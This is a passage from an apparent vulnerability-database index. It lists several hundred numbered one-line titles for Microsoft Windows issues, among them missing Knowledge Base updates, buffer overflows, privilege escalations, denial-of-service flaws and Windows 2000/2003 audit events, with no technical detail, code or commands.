Base Article 969883 update is not installed [52110] Microsoft Windows Windows Internet Name Service (WINS) replication partner buffer overflow [52109] Microsoft Windows Windows Internet Name Service (WINS) replication buffer overflow [52108] Microsoft Windows Knowledge Base Article 960859 update is not installed [52107] Microsoft Windows Knowledge Base Article 971032 update is not installed [52104] Microsoft Windows telnet privilege escalation [52103] Microsoft Windows Knowledge Base Article 956844 update is not installed [52102] Microsoft Windows DHTML Editing Component ActiveX control code execution [52097] Microsoft Windows Knowledge Base Article 971557 update is not installed [52096] Microsoft Windows AVI validation integer overflow [52095] Microsoft Windows AVI code execution [52093] Microsoft Windows Knowledge Base Article 971657 update is not installed [52092] Microsoft Windows Workstation Service RPC message code execution [52089] Microsoft Windows Knowledge Base Article 973908 update is not installed [51636] Microsoft Windows Knowledge Base Article KB973346 update is not installed [51471] Microsoft Windows Knowledge Base Article 970811 update is not installed [51469] Microsoft Windows Knowledge Base Article 970710 update is not installed [51468] Microsoft Windows Wireless LAN AutoConfig service buffer overflow [51465] Microsoft Windows Knowledge Base Article 969856 update is not installed [51463] Microsoft Windows Knowledge Base Article 971633 update is not installed [51462] Microsoft Windows Knowledge Base Article 969516 update is not installed [51457] Microsoft Windows Knowledge Base Article 957638 update is not installed [51097] Microsoft Windows atapi.sys privilege escalation [51034] Microsoft PowerPoint Freelance Windows buffer overflow [50973] Microsoft Windows Server 2003 and Vista win32k.sys denial of service [50903] Microsoft Windows SPI_SETDESKWALLPAPER SystemParametersInfo denial of service [50826] Microsoft Windows Knowledge Base Article 969898 update is not installed [50798] Microsoft Windows Knowledge Base Article 970238 update is not installed [50797] Microsoft Windows RPC Marshalling Engine code execution [50795] Microsoft Windows Knowledge Base Article 969514 update is not installed [50791] Microsoft Windows Knowledge Base Article 969462 update is not installed [50783] Microsoft Windows Knowledge Base Article 968537 update is not installed [50782] Microsoft Windows desktop parameter privilege escalation [50781] Microsoft Windows system call privilege escalation [50780] Microsoft Windows kernel pointer privilege escalation [50779] Microsoft Windows kernel kernel objects privilege escalation [50778] Microsoft Windows Knowledge Base Article 963093 update is not installed [50777] Microsoft Windows Search weak security [50776] Microsoft Windows Knowledge Base Article 969897 update is not installed [50768] Microsoft Windows Knowledge Base Article 970483 update is not installed [50767] Microsoft Windows Knowledge Base Article 971055 update is not installed [50766] Microsoft Windows Knowledge Base Article 961501 update is not installed [50765] Microsoft Windows Print Spooler service privilege escalation [50763] Microsoft Windows Print Spooler service buffer overflow [50762] Microsoft Windows Knowledge Base Article 961371 update is not installed [50761] Microsoft Windows Active Directory LDAP denial of service [50760] Microsoft Windows Embedded OpenType (EOT) integer overflow [50759] Microsoft Windows 2000 Active Directory LDAP code execution [50758] Microsoft Windows EOT buffer overflow [50757] Microsoft Windows Knowledge Base Article 957632 update is not installed [50391] Microsoft Windows Media Player MID file denial of service [50281] Microsoft Windows Knowledge Base Article 967340 update is not installed [50129] Microsoft Windows gdiplus.dll PNG denial of service [49598] Microsoft Windows Knowledge Base Article 959426 update is not installed [49588] Microsoft Windows Knowledge Base Article 960477 update is not installed [49586] Microsoft Windows Knowledge Base Article 959454 update is not installed [49584] Microsoft Windows Threadpool ACL privilege escalation [49581] Microsoft Windows RPCSS privilege escalation [49578] Microsoft Windows WMI privilege escalation [49570] Microsoft Windows Knowledge Base Article 961759 update is not installed [49569] Microsoft Windows Knowledge Base Article 960803 update is not installed [49566] Microsoft Windows HTTP services certificate spoofing [49562] Microsoft Windows HTTP services integer underflow [49560] Microsoft Windows Knowledge Base Article 961373 update is not installed [49558] Microsoft Windows Knowledge Base Article 963027 update is not installed [49547] Microsoft Windows Knowledge Base Article 968557 update is not installed [49438] Microsoft Windows GDI+ EMF EmfPlusFont Object denial of service [49435] Microsoft Windows unlzh.c and unpack.c gzip code execution [49079] Microsoft Windows DNS server memory leak denial of service [48909] Microsoft Windows Knowledge Base Article 962238 update is not installed [48908] Microsoft Windows WINS server WPAD and ISATAP registration Web proxy spoofing [48907] Microsoft Windows DNS server WPAD registration Web proxy spoofing [48906] Microsoft Windows DNS server cache response spoofing [48905] Microsoft Windows DNS server query response spoofing [48392] Microsoft Windows I/O information disclosure [48326] Microsoft Windows Knowledge Base Article 960715 update is not installed [48312] Microsoft Windows Knowledge Base Article 959420 update is not installed [48311] Microsoft Windows Knowledge Base Article 961260 update not installed [48308] Microsoft Windows Knowledge Base Article 960225 update is not installed [48307] Microsoft Windows SChannel certificate spoofing [48302] Microsoft Windows Knowledge Base Article 957634 update not installed [48301] Microsoft Windows Knowledge Base Article 958690 update is not installed [48300] Microsoft Windows kernel pointer validation privilege escalation [48299] Microsoft Windows kernel handle validation privilege escalation [48298] Microsoft Windows kernel GDI validation code execution [48295] Microsoft Windows Knowledge Base Article 974378 update not installed [48189] Microsoft Windows AutoRun feature enabled [47867] Microsoft Windows .CHM file denial of service [47760] Microsoft Windows Media Player WAV file code execution [47676] Microsoft Windows Knowledge Base Article 958687 update not installed [47674] Microsoft Windows SMB NT Trans2 request code execution [47673] Microsoft Windows SMB NT Trans request buffer overflow [47672] Microsoft Windows Knowledge Base Article 959239 update not installed [47664] Microsoft Windows Media Player WAV or SND file denial of service [47428] Microsoft Windows Knowledge Base Article 960714 update is not installed [46870] Microsoft Windows Knowledge Base Article 959807 update is not installed [46869] Microsoft Windows Media Components ISATAP information disclosure [46868] Microsoft Windows Media Components SPN NTLM credentials code execution [46867] Microsoft Windows Knowledge Base Article 959349 update is not installed [46866] Microsoft Windows search-ms protocol code execution [46865] Microsoft Windows saved search file code execution [46864] Microsoft Windows Knowledge Base Article 959070 update is not installed [46861] Microsoft Windows Knowledge Base Article 958215 update not installed [46856] Microsoft Windows Knowledge Base Article 957175 update is not installed [46853] Microsoft Windows Knowledge Base Article 957173 update not installed [46844] Microsoft Windows Knowledge Base Article 956802 update is not installed [46843] Microsoft Windows GDI WMF image file buffer overflow [46842] Microsoft Windows GDI WMF image file integer overflow [46742] Microsoft Windows Vista iphlpapi.dll buffer overflow [46670] Microsoft Communicator, Office Communications Server (OCS) and Windows Live Messenger RTCP unspecified denial of service [46506] Microsoft Windows UnhookWindowsHookEx() denial of service [46385] Microsoft Windows Media Player MIDI or DAT file denial of service [46194] Microsoft Windows Knowledge Base Article 957097 update is not installed [46191] Microsoft Windows SMB NTLM credentials code execution [46190] Microsoft Windows Knowledge Base Article 932349 update is not installed [46188] Microsoft Visual Basic Windows Common ActiveX control AVI buffer overflow [46102] Microsoft Windows 2003 SP2 is not installed on the system [46101] Microsoft Windows 2003 SP1 is not installed on the system [46100] Microsoft Windows XP Service Pack 3 is not installed on the system [46099] Microsoft Windows XP Service Pack 1 is not installed on the system [46042] Microsoft Windows Knowledge Base Article 958644 update not installed [46040] Microsoft Windows Server Service RPC code execution [45857] Microsoft Windows Mobile HTC Hermes device security bypass [45719] Microsoft Windows Vista page faults denial of service [45586] Microsoft Windows Knowledge Base Article 957280 update is not installed [45585] Microsoft Windows Active Directory LDAP search buffer overflow [45582] Microsoft Windows Knowledge Base Article 956803 update is not installed [45581] Microsoft Windows Knowledge Base Article 956416 update is not installed [45578] Microsoft Windows Ancillary Function Driver privilege escalation [45572] Microsoft Windows Knowledge Base Article 9556841 update is not installed [45571] Microsoft Windows Memory Manager Virtual Address Descriptors privilege escalation [45565] Microsoft Windows Knowledge Base Article 956390 update is not installed [45561] Microsoft Windows Knowledge Base Article 957095 update is not installed [45560] Microsoft Windows SMB file name buffer underflow [45557] Microsoft Windows Knowledge Base Article 955218 update is not installed [45550] Microsoft Windows Knowledge Base Article 957699 update is not installed [45548] Microsoft Windows Knowledge Base Article 953155 update is not installed [45545] Microsoft Windows Internet Printing Protocol code execution [45544] Microsoft Windows Knowledge Base Article 954211 update is not installed [45543] Microsoft Windows kernel input privilege escalation [45542] Microsoft Windows kernel system calls privilege escalation [45541] Microsoft Windows kernel new window privilege escalation [45538] Microsoft Windows Knowledge Base Article 951071 update is not installed [45464] Microsoft Windows XP GDI+ .ICO denial of service [45463] Microsoft Windows Mobile bluetooth device name denial of service [45209] Microsoft Windows Media Player installed [45146] Microsoft Windows WRITE_ANDX SMB packet denial of service [45015] Microsoft Windows Image Aquisition Logger ActiveX control file overwrite [44727] Microsoft Windows Knowledge Base Article 956391 update not installed [44716] Microsoft Windows Knowledge Base Article 954593 update not installed [44715] Microsoft Windows GDI+ BMP header buffer overflow [44714] Microsoft Windows GDI+ WMF buffer overflow [44713] Microsoft Windows GDI+ GIF index parsing buffer overflow [44711] Microsoft Windows GDI+ EMF code execution [44710] Microsoft Windows GDI+ VML gradient buffer overflow [44708] Microsoft Windows Knowledge Base Article 955047 update not installed [44705] Microsoft Windows Knowledge Base Article 956695 update not installed [44703] Microsoft Windows Knowledge Base Article 954156 update not installed [44700] Microsoft Windows Media Encoder wmex.dll ActiveX control buffer overflow [44625] Microsoft Windows ATL Load() code execution [44423] Microsoft Windows nslookup.exe code execution [44106] Microsoft Windows Knowledge Base Article 953839 update not installed [44099] Microsoft Windows Knowledge Base Article 953838 update not installed [44092] Microsoft Windows Knowledge Base Article 954066 update not installed [44087] Microsoft Windows Knowledge Base Article 953733 update not installed [44086] Microsoft Windows IPSec policy information disclosure [44085] Microsoft Windows Knowledge Base Article 952954 update not installed [44083] Microsoft Windows Knowledge Base Article 954154 update not installed [44082] Microsoft Windows Media Player sampling rate SSPL buffer overflow [44081] Microsoft Windows Knowledge Base Article 955048 update not installed [44080] Microsoft Windows Knowledge Base Article 955617 update not installed [44079] Microsoft Windows Knowledge Base Article 950974 update not installed [43340] Microsoft Windows Knowledge Base Article 950582 update not installed [43339] Microsoft Windows Explorer saved search file code execution [43336] Microsoft Windows Knowledge Base Article 953230 update not installed [43335] Microsoft Windows DNS Server cache poisoning [43330] Microsoft Windows Knowledge Base Article 953747 update not installed [42887] Microsoft Windows Installer msiexec.exe GUID buffer overflow [42765] Apple Safari Microsoft Windows code execution [42701] Microsoft Windows Knowledge Base Article 950760 update not installed [42699] Microsoft Windows Vista speech recognition (sapi.dll) command execution [42697] Microsoft Windows Knowledge Base Article 950762 update not installed [42696] Microsoft Windows PGM fragment option denial of service [42695] Microsoft Windows PGM option length denial of service [42693] Microsoft Windows Knowledge Base Article 950759 update not installed [42691] Microsoft Windows Knowledge Base Article 949785 update not installed [42689] Microsoft Windows Knowledge Base Article 951066 update not installed bluetooth [42685] Microsoft Windows Knowledge Base Article 951376 update not installed [42684] Microsoft Windows Knowledge Base Article 948745 update not installed [42682] Microsoft Windows Bluetooth SDP code execution [42677] Microsoft Windows Knowledge Base Article 955702 update not installed [42676] Microsoft Windows Messenger ActiveX control information disclosure [42675] Microsoft Windows Knowledge Base Article 951698 update not installed [42674] Microsoft Windows DirectX SAMI buffer overflow [42672] Microsoft Windows Knowledge Base Article 953235 update not installed [42668] Microsoft Windows Active Directory LDAP request denial of service [42358] Microsoft Windows I2O Utility Filter driver (i2omgmt.sys) code execution [42334] Microsoft Windows CE JPEG and GIF code execution [42109] Microsoft Windows Knowledge Base Article 952044 update not installed [42103] Microsoft Windows Knowledge Base Article 951208 update not installed [42101] Microsoft Windows Knowledge Base Article 951207 update not installed [42095] Microsoft Windows Knowledge Base Article 950749 update not installed [41880] Microsoft Windows MSDTC privilege escalation [41481] Microsoft Windows Knowledge Base Article 945553 update not installed [41480] Microsoft Windows DNS client spoofing [41477] Microsoft Windows Knowledge Base Article 947864 update not installed [41473] Microsoft Windows Knowledge Base Article 948590 update not installed [41472] Microsoft Windows GDI EMF filename parameter buffer overflow [41471] Microsoft Windows GDI EMF and WMF header buffer overflow [41470] Microsoft Windows Knowledge Base Article 941693 update not installed [41469] Microsoft Windows kernel usermode privilege escalation [41465] Microsoft Windows Knowledge Base Article 948881 update not installed [41463] Microsoft Windows Knowledge Base Article 941203 update not installed [41453] Microsoft Windows Knowledge Base Article 949032 update not installed [41448] Microsoft Windows Knowledge Base Article 950183 update not installed [41349] Microsoft Windows AutoPlay NoDriveTypeAutoRun weak security [40937] Microsoft Windows Knowledge Base Article 815495 update not installed [40889] Microsoft Windows Knowledge Base Article 949030 update not installed [40886] Microsoft Windows Knowledge Base Article 949031 update not installed [40879] Microsoft Windows Knowledge Base Article 949029 update not installed [40693] Microsoft Windows Video Controller ActiveX Library for streaming video (msvidctl.dll) buffer overflow [40103] Microsoft Windows Knowledge Base Article 946538 update not installed [40102] Microsoft Windows Active Directory LDAP request denial of service [40101] Microsoft Windows Knowledge Base Article 947077 update not installed [40099] Microsoft Windows Knowledge Base Article 946456 update not installed [40098] Microsoft Windows Vista DHCP denial of service [40097] Microsoft Windows Knowledge Base Article 947081 update not installed [40094] Microsoft Windows Knowledge Base Article 947085 update not installed [40091] Microsoft Windows Knowledge Base Article 944533 update not installed [40078] Microsoft Windows Knowledge Base Article 947108 update not installed [40063] Microsoft Windows Knowledge Base Article 946026 update not installed [40062] Microsoft Windows WebDAV Mini-Redirector buffer overflow [40059] Microsoft Windows Knowledge Base Article 944338 update not installed [40056] Microsoft Windows VBScript and JScript engines code execution [40048] Microsoft Windows Knowledge Base Article 947890 update not installed [40043] Microsoft Windows OLE script request buffer overflow [39453] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) MLDv2 buffer overflow [39452] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) IGMPv3 buffer overflow [39254] Microsoft Windows TCP/IP ICMP denial of service [39238] Microsoft Windows Knowledge Base Article 941644 update not installed [39237] Microsoft Windows Knowledge Base Article 942831 update not installed [39236] Microsoft Windows Knowledge Base Article 943485 update not installed [39233] Microsoft Windows LSASS LPC privilege escalation [39232] Microsoft Windows Knowledge Base Article 942830 update not installed [39052] Microsoft Windows DirectX MJPEG decoder code execution [38865] Cisco Security Agent for Microsoft Windows SMB buffer overflow [38850] Microsoft Windows CryptGenRandom information disclosure [38830] Microsoft Windows Media File Format Stream Property error correction buffer overflow [38829] Microsoft Windows Media File Format Stream Property error correction and type-specific buffer overflow [38828] Microsoft Windows Media File Format audio_conceal_none buffer overflow [38827] Microsoft Windows Media File Format Degradable JPEG Media Stream buffer overflow [38797] Microsoft Windows Media Player AIFF denial of service [38730] Microsoft Windows Knowledge Base Article 943078 update not installed [38729] Microsoft Windows Vista kernel ALPC privilege escalation [38728] Microsoft Windows Knowledge Base Article 944653 update not installed [38726] Microsoft Windows Knowledge Base Article 942624 update not installed [38725] Microsoft Windows Vista SMBv2 signing code execution [38723] Microsoft Windows Knowledge Base Article 941568 update not installed [38717] Microsoft Windows Knowledge Base Article 942615 update not installed [38711] Microsoft Windows Knowledge Base Article 941569 update not installed [38315] Microsoft Windows Knowledge Base Article 943460 update not installed [37284] Microsoft Windows Macrovision secdrv.sys driver buffer overflow [37249] Microsoft Windows Mobile SMS sender field obfuscation [37226] Microsoft Windows Knowledge Base Article 815495 update not installed [36980] Microsoft Windows Explorer PNG file denial of service [36961] Microsoft Windows Explorer extended attributes multiple buffer overflows [36819] Microsoft Windows Knowledge Base Article 939653 update not installed [36812] Microsoft Windows Knowledge Base Article 941202 update not installed [36811] Microsoft Outlook Express and Windows Mail NNTP response code execution [36807] Microsoft Windows Knowledge Base Article 933729 update not installed [36806] Microsoft Windows Knowledge Base Article 941672 update not installed [36805] Microsoft Windows DNS spoofing information disclosure [36804] Microsoft Windows Knowledge Base Article 942695 update not installed [36803] Microsoft Windows RPC NTLMSSP authentication denial of service [36800] Microsoft Windows Knowledge Base Article 923810 update not installed [36799] Microsoft Windows Kodak image Viewer code execution [36662] Microsoft Windows Media Player meta file security bypass [36608] Microsoft Windows MFC ActiveX FindFile() buffer overflow [36490] Microsoft Windows Knowledge Base Article 942099 update not installed [36381] Microsoft Windows Knowledge Base Article 939778 update not installed [36378] Microsoft Windows UNIX services setuid binary privilege escalation [36376] Microsoft Windows Knowledge Base Article 941522 update not installed [35919] Microsoft Windows VML detected [35902] Microsoft Windows process scheduler denial of service [35897] Microsoft Windows Vista Weather Gadget code execution [35895] Microsoft Windows Media Player skin decompression code execution [35886] Microsoft Windows ARP request denial of service [35878] Microsoft Windows Media Player .AU file denial of service [35853] Microsoft Windows Vista kernel unspecified vulnerability [35816] Microsoft Windows Knowledge Base Article 940965 update not installed [35802] Microsoft Windows Vista Calendar ICS denial of service [35771] Microsoft Windows Vista Contacts Gadget code execution [35770] Microsoft Windows Vista Feed Headlines Gadget code execution [35766] Microsoft Windows Knowledge Base Article 937894 update not installed [35762] Microsoft Windows Knowledge Base Article 938127 update not installed [35761] Microsoft Windows VML vgx.dll buffer overflow [35760] Microsoft Windows Knowledge Base Article 937143 update not installed [35753] Microsoft Windows Knowledge Base Article 938827 update not installed [35746] Microsoft Windows Knowledge Base Article 938829 update not installed [35745] Microsoft Windows GDI WMF image code execution [35742] Microsoft Windows Knowledge Base Article 936782 update not installed [35741] Microsoft Windows Media Player skin parsing buffer overflow [35739] Microsoft Windows Knowledge Base Article 942017 update not installed [35582] Microsoft Windows URI protocol handling command execution [35538] Microsoft Windows Explorer GIF denial of service [35397] Microsoft Windows Vista USER32.DLL denial of service [35322] Microsoft Windows Vista firewall information disclosure [35219] Microsoft Windows Knowledge Base Article 936542 update is not installed [35216] Microsoft Windows Knowledge Base Article 933103 update not installed [35206] Microsoft Windows Knowledge Base Article 939373 update is not installed [35202] Microsoft Windows Knowledge Base Article 935807 update not installed [35199] Microsoft Windows Knowledge Base Article 936227 update not installed [35190] Microsoft Windows Knowledge Base Article 936548 update not installed [35183] Microsoft Windows Knowledge Base Article 937986 update not installed [35181] Microsoft Windows Knowledge Base Article 926122 update is not installed [35180] Microsoft Windows Active Directory LDAP denial of service [35179] Microsoft Windows Active Directory LDAP attribute buffer overflow [35059] Microsoft Windows TCP/IP Source Specific Multicasting (SSM) multiple buffer overflows [34743] Microsoft Windows GDI+ denial of service [34648] Microsoft Windows Knowledge Base Article 935839 update not installed [34645] Microsoft Windows Win32 API code execution [34642] Microsoft Windows Knowledge Base Article 935840 update not installed [34640] Microsoft Windows Knowledge Base Article 931212 update not installed .NET [34636] Microsoft Windows Schannel code execution [34634] Microsoft Windows Server 2003 Active Directory information disclosure [34633] Microsoft Windows Knowledge Base Article 933566 update not installed [34624] Microsoft Windows Knowledge Base Article 929123 update not installed [34623] Microsoft Windows MHTML Content-Disposition information disclosure [34622] Microsoft Windows MHTML URL redirect information disclosure [34618] Microsoft Windows Vista ACL user credentials information disclosure [34611] Microsoft Windows Knowledge Base Article 927051 update not installed [34599] Microsoft Windows Server 2003 terminal server security bypass [34444] Microsoft Windows unspecified code execution [34032] Microsoft Windows Knowledge Base Article 935966 update not installed [33959] Microsoft Windows Virtual DOS Machine (VDM) VdmpInitialize privilege escalation [33916] Microsoft Windows Knowledge Base Article 934233 update not installed [33909] Microsoft Windows Knowledge Base Article 934873 update not installed [33902] Microsoft Windows Knowledge Base Article 934232 update not installed [33891] Microsoft Windows Knowledge Base Article 931832 update not installed [33667] Microsoft Windows unspecified buffer overflow [33629] Microsoft Windows DNS Server RPC interface buffer overflow [33473] Microsoft Windows dynamic DNS update unauthorized access [33410] Microsoft Windows Vista LLTD Mapper host spoofing [33409] Microsoft Windows Vista LLTD Mapper bridge spoofing [33401] Microsoft Windows Vista LLTD Responder host spoofing [33399] Microsoft Windows Vista LLTD Mapper denial of service [33398] Microsoft Windows Vista Teredo address weak security [33396] Microsoft Windows Vista Meeting Space weak security [33395] Microsoft Windows Vista nonce spoofing [33394] Microsoft Windows Vista Neighbor Advertisements spoofing [33393] Microsoft Windows Vista ARP denial of service [33301] Microsoft Windows animated cursor (ANI) buffer overflow [33300] Microsoft Windows Vista atikmdag.sys slideshow denial of service [33272] Microsoft Windows Vista CSRSS CsrFinalizeContext privilege escalation [33271] Microsoft Windows Knowledge Base Article 931784 update not installed [33270] Microsoft Windows kernel VDM mapped memory privilege escalation [33269] Microsoft Windows Knowledge Base Article 931261 update not installed [33268] Microsoft Windows Universal Plug and Play HTTP buffer overflow [33267] Microsoft Windows Knowledge Base Article 932168 update not installed [33266] Microsoft Windows Knowledge Base Article 925902 update not installed [33264] Microsoft Windows TrueType Fonts rasterizer privilege escalation [33263] Microsoft Windows GDI color parameter buffer overflow [33261] Microsoft Windows GDI window size privilege escalation [33259] Microsoft Windows GDI EMF image buffer overflow [33258] Microsoft Windows GDI WMF image denial of service [33257] Microsoft Windows Knowledge Base Article 931768 update not installed [33244] Microsoft Windows Web Proxy Autodiscovery Protocol (WPAD) information disclosure [33225] Microsoft Windows Media File Format ASF multiple buffer overflows [33167] Microsoft Windows Vista Mail Client code execution [33118] Microsoft Windows XP winmm.dll denial of service [33117] Microsoft Windows MFC AfxOleSetEditMenu() buffer overflow [33086] Microsoft Windows Ndistapi.sys driver denial of service [33037] Microsoft Windows Explorer WMF file denial of service [32921] Microsoft Windows ole32.dll library denial of service [32808] Microsoft Windows Shell User Logon ActiveX control shgina.dll unauthorized access [32740] Microsoft Windows Knowledge Base Article 931906 update not installed [32738] Microsoft Windows Knowledge Base Article 925939 update not installed [32644] Microsoft Windows ReadDirectoryChangesW information disclosure [32419] Microsoft Windows Knowledge Base Article 932554 update not installed [32394] Microsoft Windows Mobile Internet Explorer WML page denial of service [32282] Microsoft Windows Knowledge Base Article 927802 update not installed [32280] Microsoft Windows Image Acquisition service buffer overflow [32153] Microsoft Windows permanent password detected [32116] Microsoft Windows administrator password no expiration set [32111] Microsoft Windows Knowledge Base Article 928255 update not installed [32110] Microsoft Windows Knowledge Base Article 928843 update not installed [32109] Microsoft Windows HTML Help ActiveX control code execution [32108] Microsoft Windows shell new hardware detection privilege escalation [32107] Microsoft Windows Knowledge Base Article 928090 update not installed [32104] Microsoft Windows Knowledge Base Article 929434 update not installed [32090] Microsoft Windows Knowledge Base Article 927779 update not installed [32071] Microsoft Windows Explorer AVI file denial of service [32002] Microsoft Windows Mobile Pictures and Videos JPEG denial of service [32001] Microsoft Windows Mobile Internet Explorer unspecified denial of service [31845] Microsoft Windows user account never used [31844] Microsoft Windows guest user account unchanged [31843] Microsoft Windows built-in guest account enumerated [31842] Microsoft Windows user account password unchanged [31821] Microsoft Windows time zone update for year 2007 [31288] Microsoft Windows Knowledge Base Article 929969 update not installed [31264] Microsoft Windows Knowledge Base Article 930178 update not installed [31210] Microsoft Windows Knowledge Base Article 927198 update is not installed [31199] Microsoft Windows Knowledge Base Article 921585 update is not installed [31191] Microsoft Windows Knowledge Base Article 925938 update is not installed [31176] Microsoft Windows CSRSS NtRaiseHardError() information disclosure [31085] Microsoft Windows Workstation service NetrWkstaUserEnum denial of service [31018] Microsoft Windows CSRSS MessageBox function privilege escalation [31015] Microsoft Windows Explorer WMV file denial of service [31014] Microsoft Windows Media Player MIDI file denial of service [31008] Microsoft Windows XP directory weak permission [30757] Microsoft Windows Knowledge Base Article 926121 update not installed [30756] Microsoft Windows Remote Installation Service code execution [30717] Microsoft Windows Print Spooler denial of service [30610] Microsoft Windows Knowledge Base Article 926436 update not installed [30608] Microsoft Windows Knowledge Base Article 926255 update not installed [30607] Microsoft Windows file manifest privilege escalation [30606] Microsoft Windows Knowledge Base Article 926247 update not installed [30605] Microsoft Windows SNMP service buffer overflow [30604] Microsoft Windows Knowledge Base Article 925454 update not installed [30599] Microsoft Windows Knowledge Base Article 924667 update not installed [30598] Microsoft Windows and Visual Studio MFC components RTF code execution [30597] Microsoft Windows Knowledge Base Article 923723 update not installed [30595] Microsoft Windows Knowledge Base Article 923689 update not installed [30594] Microsoft Windows Media Player ASF processing buffer overflow [30593] Microsoft Windows Knowledge Base Article 918118 update not installed [30592] Microsoft Windows and Office Rich Edit components code execution [30591] Microsoft Windows Knowledge Base Article 925674 update not installed [30586] Microsoft Windows Media Player ASX playlist buffer overflow [30553] Microsoft Windows Live Messenger emoticon denial of service [30172] Microsoft Windows Knowledge Base Article 928088 update not installed [30042] Microsoft Windows GDI kernel privilege escalation [29954] Microsoft Windows Knowledge Base Article 923980 update not installed [29953] Microsoft Windows Client Service for NetWare (CSNW) denial of service [29952] Microsoft Windows Client Service for NetWare (CSNW) buffer overflow [29950] Microsoft Windows Knowledge Base Article 920213 update is not installed [29949] Microsoft Windows Knowledge Base Article 924270 update not installed [29948] Microsoft Windows Workstation service NetpManageIPCConnect buffer overflow [29943] Microsoft Windows Knowledge Base Article 923789 update not installed [29917] Microsoft Windows XP NAT Helper ipnathlp.dll denial of service [29546] Microsoft Windows 2000/2003 user logoff initiated [29545] Microsoft Windows 2000/2003 system time changed [29544] Microsoft Windows 2000/2003 system security access removed [29543] Microsoft Windows 2000/2003 security access granted [29542] Microsoft Windows 2000/2003 SAM notification package loaded [29541] Microsoft Windows 2000/2003 primary security token issued [29540] Microsoft Windows 2000/2003 user password reset successful [29539] Microsoft Windows 2000/2003 object indirectly accessed [29538] Microsoft Windows 2000/2003 object handle duplicated [29537] Microsoft Windows 2000/2003 logon with explicit credentials success [29536] Microsoft Windows 2000/2003 logon attempt using explicit credentials unsuccessful [29535] Microsoft Windows 2000/2003 IPSEC policy agent failed [29534] Microsoft Windows 2000/2003 IPSEC policy agent disabled [29533] Microsoft Windows 2000/2003 IPSEC policy agent changed [29532] Microsoft Windows 2000/2003 IKE security association established [29531] Microsoft Windows 2000/2003 IKE quick mode association ended [29530] Microsoft Windows 2000/2003 IKE main mode association ended [29529] Microsoft Windows 2000/2003 IKE association negotiation failed [29528] Microsoft Windows 2000/2003 IKE association peer authentication failed [29527] Microsoft Windows 2000/2003 IKE association failed invalid proposal [29526] Microsoft Windows 2000/2003 IKE association failed authentication parameters [29525] Microsoft Windows 2000/2003 DPAPI master key backup attempted [29524] Microsoft Windows 2000/2003 DPAPI key recovery attempted [29523] Microsoft Windows 2000/2003 DPAPI auditable data unprotected [29522] Microsoft Windows 2000/2003 administrative group security descriptor set [29521] Microsoft Windows 2000/2003 account name changed [29400] Microsoft Windows drmstor.dll denial of service [29373] Microsoft Windows SMB rename denial of service [29369] Microsoft Windows Knowledge Base Article 922819 update is not installed [29253] Microsoft Windows error report transmission detected [29243] Microsoft Windows Knowledge Base Article 924164 update is not installed [29236] Microsoft Windows Knowledge Base Article 924163 update is not installed [29229] Microsoft Windows Knowledge Base Article 923694 update not installed [29227] Microsoft Outlook Express Windows Address Book (WAB) buffer overflow [29226] Microsoft Windows Knowledge Base Article 924554 update is not installed [29214] Microsoft Windows Knowledge Base Article 922581 update is not installed [29211] Microsoft Windows Knowledge Base Article 924191 update is not installed [29208] Microsoft Windows Knowledge Base Article 924496 update is not installed [29205] Microsoft Windows Object Packager file extension spoofing code execution [29204] Microsoft Windows Knowledge Base Article 923414 update is not installed [29202] Microsoft Windows Knowledge Base Article 922760 update is not installed [29201] Microsoft Windows Knowledge Base Article 923191 update is not installed [29171] Microsoft Windows Knowledge Base Article 925486 update is not installed [28664] Microsoft Windows Knowledge Base Article 922770 update is not installed [28660] Microsoft Windows Knowledge Base Article 921503 update is not installed [28659] Microsoft Windows OLE Automation code execution [28656] Microsoft Windows Knowledge Base Article 924090 update not installed [28652] Microsoft Windows Knowledge Base Article 920685 update is not installed [28649] Microsoft Windows Knowledge Base Article 910729 update is not installed [28646] Microsoft Windows Knowledge Base Article 919007 update is not installed [28643] Microsoft Windows XP PGM buffer overflow [28600] Microsoft Windows winhlp32 HLP file unspecified code execution [28512] Microsoft Internet Explorer multiple Windows 2000 COM object denial of service [28474] Microsoft Windows PNG IHDR block denial of service [28281] Microsoft Windows WMF gdi32.dll denial of service [28240] Microsoft Windows DNS client data string buffer overflow [28183] Microsoft Windows gdiplus.dll denial of service [28045] Microsoft Windows Knowledge Base Article 918899 update is not installed [28028] Microsoft Windows Knowledge Base Article 922616 update is not installed [28027] Microsoft Windows Knowledge Base Article 922968 update is not installed [28024] Microsoft Windows Knowledge Base Article 921645 update is not installed [28022] Microsoft Windows Knowledge Base Article 920670 update is not installed [28020] Microsoft Windows Hyperlink Object Library (hlink.dll) buffer overflow [28019] Microsoft Windows Knowledge Base Article 920214 update is not installed [28018] Microsoft Windows Knowledge Base Article 921398 update is not installed [28017] Microsoft Windows Knowledge Base Article 920958 update is not installed [28016] Microsoft Windows kernel system inputs buffer overflow [28015] Microsoft Windows Knowledge Base Article 920683 update is not installed [28014] Microsoft Windows Winsock API buffer overflow [28013] Microsoft Windows DNS client buffer overflow [28012] Microsoft Windows Knowledge Base Article 917422 update is not installed [28011] Microsoft Windows kernel exception handling code execution [28009] Microsoft Windows kernel Winlogon privilege escalation [28008] Microsoft Windows Knowledge Base Article 917008 update is not installed [28005] Microsoft Windows 2000 Management Console (MMC) resource file cross-site scripting [28004] Microsoft Windows Knowledge Base Article 921883 update is not installed [28002] Microsoft Windows Server service buffer overflow [27999] Microsoft Windows SMB malformed PIPE denial of service [27832] Microsoft Windows ASN.1 Library HTTP NTLM buffer overflow [27567] Microsoft Windows explorer.exe Internet Shortcut (.url) denial of service [27562] Microsoft Windows Knowledge Base Article 915384 update is not installed [27554] Microsoft Windows Knowledge Base Article 917284 update is not installed [27467] Microsoft Windows Knowledge Base Article 917285 update is not installed [27417] Microsoft Windows Live Messenger contact list denial of service [26905] Microsoft Windows Knowledge Base Article 918547 update is not installed [26903] Microsoft Windows Knowledge Base Article 917336 update is not installed [26886] Microsoft Windows Knowledge Base Article 917953 update is not installed [26884] Microsoft Windows Knowledge Base Article 917736 update is not installed [26883] Microsoft Windows Knowledge Base Article 917537 update is not installed [26882] Microsoft Windows Knowledge Base Article 917344 update is not installed [26880] Microsoft Windows Knowledge Base Article 917159 update is not installed [26876] Microsoft Windows Knowledge Base Article 916281 update is not installed [26874] Microsoft Windows Knowledge Base Article 914389 update is not installed [26871] Microsoft Windows Knowledge Base Article 914388 update is not installed [26868] Microsoft Windows Knowledge Base Article 917734 update is not installed [26867] Microsoft Windows Knowledge Base Article 911280 update is not installed [26865] Microsoft Windows Knowledge 